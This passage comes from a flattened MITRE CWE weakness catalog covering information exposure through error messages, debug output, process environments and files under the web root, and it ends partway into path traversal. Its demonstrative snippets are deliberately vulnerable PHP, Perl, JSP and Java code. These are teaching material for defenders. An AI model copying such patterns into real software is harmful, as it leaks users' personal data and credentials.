https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603 - - - CVE-2017-9615 - verbose logging stores admin credentials in a world-readablelog file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615 - - - CVE-2018-1999036 - SSH password for private key stored in build log - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036 - - - - - Accidental leaking of sensitive information through error messages - - - A6 - Information Leakage and Improper Error Handling - CWE More Specific - - - A7 - Improper Error Handling - CWE More Specific - - - A10 - Insecure Configuration Management - CWE More Specific - - - ERR01-J - Do not allow exceptions to expose sensitive information - - - SFP23 - Exposed Data - - - - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2009-01-12 - updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Name, Potential_Mitigations, References, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, References, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References - - - Veracode - 2010-09-09 - Suggested OWASP Top Ten mapping - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated References - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples, Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Error Message Information Leaks - Error Message Information Leak - Information Exposure Through an Error Message - - - - The software identifies an error condition and creates its own diagnostic or error messages that contain sensitive information. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Application Data - - - - - Implementation - Build and Compilation - Compilation or Build Hardening - Debugging information should not make its way into a production release. - - - Implementation - Build and Compilation - Environment Hardening - Debugging information should not make its way into a production release. - - - - - The following code uses custom configuration files for each user in the application. It checks to see if the file exists on the system before attempting to open and use the file. If the configuration file does not exist, then an error is generated, and the application exits. - - $uname = GetUserInput("username"); - - - # avoid CWE-22, CWE-78, others. - if ($uname !~ /^\w+$/){ExitError("Bad hacker!") ;} - $filename = "/home/myprog/config/" . $uname . ".txt";if (!(-e $filename)){ExitError("Error: $filename does not exist");} - - If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that is not associated with a configuration file, an attacker could get this pathname from the error message. It could then be used to exploit path traversal, symbolic link following, or other problems that may exist elsewhere in the application. - - - - - CVE-2005-1745 - Infoleak of sensitive information in error message (physical access required). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1745 - - - - - Product-Generated Error Message Infoleak - - - SFP23 - Exposed Data - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Functional_Areas, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships, Time_of_Introduction - - Product-Generated Error Message Information Leak - Information Exposure Through Generated Error Message - Information Exposure Through Self-generated Error Message - - - - The application performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the application, such as an error generated by the programming language interpreter that the software uses. The error can contain sensitive system information. - - - - - - Resultant - - - - - - - - - Architecture and Design - PHP applications are often targeted for having this issue when the PHP interpreter generates the error outside of the application's control. However, other languages/environments exhibit the same issue. - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Read Application Data - - - - - System Configuration - Configure the application's environment in a way that prevents errors from being generated. For example, in PHP, disable display_errors. - - - Implementation - Build and Compilation - Compilation or Build Hardening - Debugging information should not make its way into a production release. - - - Implementation - Build and Compilation - Environment Hardening - Debugging information should not make its way into a production release. - - - Implementation - Handle exceptions internally and do not display errors containing potentially sensitive information to a user. Create default error pages if necessary. - - - Implementation - The best way to prevent this weakness during implementation is to avoid any bugs that could trigger the external error message. This typically happens when the program encounters fatal errors, such as a divide-by-zero. You will not always be able to control the use of error pages, and you might not be using a language that handles exceptions. - - - - - CVE-2004-1581 - chain: product does not protect against direct request of an include file, leading to resultant path disclosure when the include file does not successfully execute. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1581 - - - CVE-2004-1579 - Single "'" inserted into SQL query leads to invalid SQL query execution, triggering full path disclosure. Possibly resultant from more general SQL injection issue. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1579 - - - CVE-2005-0459 - chain: product does not protect against direct request of a library file, leading to resultant path disclosure when the file does not successfully execute. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0459 - - - CVE-2005-0443 - invalid parameter triggers a failure to find an include file, leading to infoleak in error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0443 - - - CVE-2005-0433 - Various invalid requests lead to information leak in verbose error messages describing the failure to instantiate a class, open a configuration file, or execute an undefined function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0433 - - - CVE-2004-1101 - Improper handling of filename request with trailing "/" causes multiple consequences, including information leak in Visual Basic error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1101 - - - - Error Handling - - - - Product-External Error Message Infoleak - - - - This is inherently a resultant vulnerability from a weakness within the product or an interaction error. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Enabling_Factors_for_Exploitation, Functional_Areas, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Name - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Product-External Error Message Information Leak - Information Exposure Through External Error Message - Information Exposure Through Externally-Generated Error Message - - - - The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors. - - Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing. - For example, software that is used for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site. - - - - - - - - - Primary - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Read Files or Directories - Read Application Data - Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack. - - - - - Requirements - Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - Attack Surface Reduction - Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible. - Defense in Depth - This makes it easier to spot places in the code where data is being used that is unencrypted. - - - Implementation - Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state. - - - - - This code either generates a public HTML user information page or a JSON response containing the same user information. - - - - // API flag, output JSON if set - $json = $_GET['json']$username = $_GET['user']if(!$json){ - $record = getUserRecord($username);foreach($record as $fieldName => $fieldValue){ - if($fieldName == "email_address") { - - - // skip displaying user emails - continue; - }else{writeToHtmlPage($fieldName,$fieldValue);} - } - }else{$record = getUserRecord($username);echo json_encode($record);} - - The programmer is careful to not display the user's e-mail address when displaying the public HTML page. However, the e-mail address is not removed from the JSON response, exposing the user's e-mail address. - - - - - CVE-2005-0406 - Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0406 - - - CVE-2002-0704 - NAT feature in firewall leaks internal IP addresses in ICMP error messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0704 - - - - - Cross-Boundary Cleansing Infoleak - - - - - - - This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked. - There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000). - The terms "cleansing" and "scrubbing" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the modification of incoming/outgoing data so that it conforms to specifications. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Name - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Cross-boundary Cleansing Information Leak - Improper Cross-boundary Cleansing - Improper Cross-boundary Removal of Sensitive Data - - - - The product's intended functionality exposes information to certain actors in accordance with the developer's security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product's administrator, users, or others whose information is being processed. - - When handling information, the developer must consider whether the information is regarded as sensitive by different stakeholders, such as users or administrators. Each stakeholder effectively has its own intended security policy that the product is expected to uphold. When a developer does not treat that information as sensitive, this can introduce a vulnerability that violates the expectations of the product's users. - - - - - - - - - - Policy - This can occur when the product's policy does not account for all relevant stakeholders, or when the policies of other stakeholders are not interpreted properly. - - - Requirements - This can occur when requirements do not explicitly account for all relevant stakeholders. - - - Architecture and Design - Communications or data exchange frameworks may be chosen that exchange or provide access to more information than strictly needed. - - - Implementation - This can occur when the developer does not properly track the flow of sensitive information and how it is exposed, e.g., via an API. - - - - - Confidentiality - Read Application Data - - - - - This code displays some information on a web page. - - Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %> - - The code displays a user's credit card and social security numbers, even though they aren't absolutely necessary. - - - - - CVE-2002-1725 - Script calls phpinfo() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725 - - - CVE-2004-0033 - Script calls phpinfo() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0033 - - - CVE-2003-1181 - Script calls phpinfo() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1181 - - - CVE-2004-1422 - Script calls phpinfo() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1422 - - - CVE-2004-1590 - Script calls phpinfo() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1590 - - - CVE-2003-1038 - Product lists DLLs and full pathnames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1038 - - - CVE-2005-1205 - Telnet protocol allows servers to obtain sensitive environment information from clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205 - - - CVE-2005-0488 - Telnet protocol allows servers to obtain sensitive environment information from clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0488 - - - - - Intended information leak - - - - This entry is being considered for deprecation. It overlaps many other entries related to information exposures. It might not be essential to preserve this entry, since other key stakeholder policies are covered elsewhere, e.g. personal privacy leaks (CWE-359) and system-level exposures that are important to system administrators (CWE-497). - In vulnerability theory terms, this covers cases in which the developer's Intended Policy allows the information to be made available, but the information might be in violation of a Universal Policy in which the product's administrator should have control over which information is considered sensitive and therefore should not be exposed. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Relationship_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Other_Notes, Relationship_Notes, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Intended Information Leak - Intentional Information Exposure - - - - A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system. - Many operating systems allow a user to list information about processes that are owned by other users. Other users could see information such as command line arguments or environment variable settings. When this data contains sensitive information such as credentials, it might allow other users to launch an attack against the software or related resources. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Read Application Data - - - - - In the example below, the password for a keystore file is read from a system property. - - String keystorePass = System.getProperty("javax.net.ssl.keyStorePassword");if (keystorePass == null) {System.err.println("ERROR: Keystore password not specified.");System.exit(-1);} - ... - - If the property is defined on the command line when the program is invoked (using the -D... syntax), the password may be displayed in the OS process list. - - - - - CVE-2005-1387 - password passed on command line - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1387 - - - CVE-2005-2291 - password passed on command line - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2291 - - - CVE-2001-1565 - username/password on command line allows local users to view via "ps" or other process listing programs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1565 - - - CVE-2004-1948 - Username/password on command line allows local users to view via "ps" or other process listing programs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1948 - - - CVE-1999-1270 - PGP passphrase provided as command line argument. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1270 - - - CVE-2004-1058 - Kernel race condition allows reading of environment variables of a process that is still spawning. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1058 - - - - System Process - - - - Process information infoleak to other processes - - - SFP23 - Exposed Data - - - - Under-studied, especially environment variables. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - Process Information Leak to Other Processes - Process Environment Information Leak - Information Exposure Through Process Environment - - - - The application inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production. - When debugging, it may be necessary to report detailed information to the programmer. However, if the debugging code is not disabled when the application is operating in a production environment, then this sensitive information may be exposed to attackers. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Implementation - Do not leave debug statements that could be executed in the source code. Ensure that all debug information is eradicated before releasing the software. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - The following program changes its behavior based on a debug flag. - - <% if (Boolean.getBoolean("debugEnabled")) { - %>User account number: <%= acctNo %><%} %> - - - - - The code writes sensitive debug information to the client browser if the "debugEnabled" flag is set to true . - - - - - CVE-2004-2268 - Password exposed in debug information. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268 - - - CVE-2002-0918 - CGI script includes sensitive information in debug messages when an error is triggered. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0918 - - - CVE-2003-1078 - FTP client with debug option enabled shows password to the screen. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078 - - - - - Infoleak Using Debug Information - - - A6 - Information Leakage and Improper Error Handling - CWE More Specific - - - A10 - Insecure Configuration Management - CWE More Specific - - - SFP23 - Exposed Data - - - - This overlaps other categories. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Name, Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Information Leak Through Debug Information - Information Exposure Through Debug Information - - - - This entry has been deprecated, as it was not effective as a weakness and was structured more like a category. In addition, the name is inappropriate, since the "container" term is widely understood by developers in different ways than originally intended by PLOVER, the original source for this entry. - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Containment Errors (Container Errors) - - - - This entry has been deprecated because it incorporated and confused multiple weaknesses. The issues formerly covered in this entry can be found at CWE-766 and CWE-767. - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-20 - deprecated this entry in favor of new entries which focus on the multiple weaknesses formerly described here, CWE-766 and CWE-767 - - - CWE Content Team - MITRE - 2009-05-27 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Description - - Failure to Protect Stored Data from Modification - - - - This weakness has been deprecated because it was a duplicate of CWE-493. All content has been transferred to CWE-493. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - Failure to Provide Confidentiality for Stored Data - DEPRECATED (Duplicate): Failure to provide confidentiality for stored data - - - - The application stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties. - - Besides public-facing web pages and code, applications may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server. If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data. - - - - - - - - - - Operation - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Confidentiality - Read Application Data - - - - - Implementation - System Configuration - Avoid storing information under the web root directory. - - - System Configuration - Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the web directory. - - - - - CVE-2005-1835 - Data file under web root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1835 - - - CVE-2005-2217 - Data file under web root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2217 - - - CVE-2002-1449 - Username/password in data file under web root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1449 - - - CVE-2002-0943 - Database file under web root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0943 - - - CVE-2005-1645 - database file under web root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1645 - - - - - Sensitive Data Under Web Root - - - A10 - Insecure Configuration Management - CWE More Specific - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Sensitive Data Under Web Root - - - - The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. - - Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal. - In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction. - - - - - - - - - Primary - - - Resultant - - - - - - - - Directory traversal - - - Path traversal - "Path traversal" is preferred over "directory traversal," but both terms are attack-focused. - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. - - - Integrity - Modify Files or Directories - The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. - - - Confidentiality - Read Files or Directories - The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. - - - Availability - DoS: Crash, Exit, or Restart - The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software. - - - - - Automated Static Analysis - Automated techniques can find 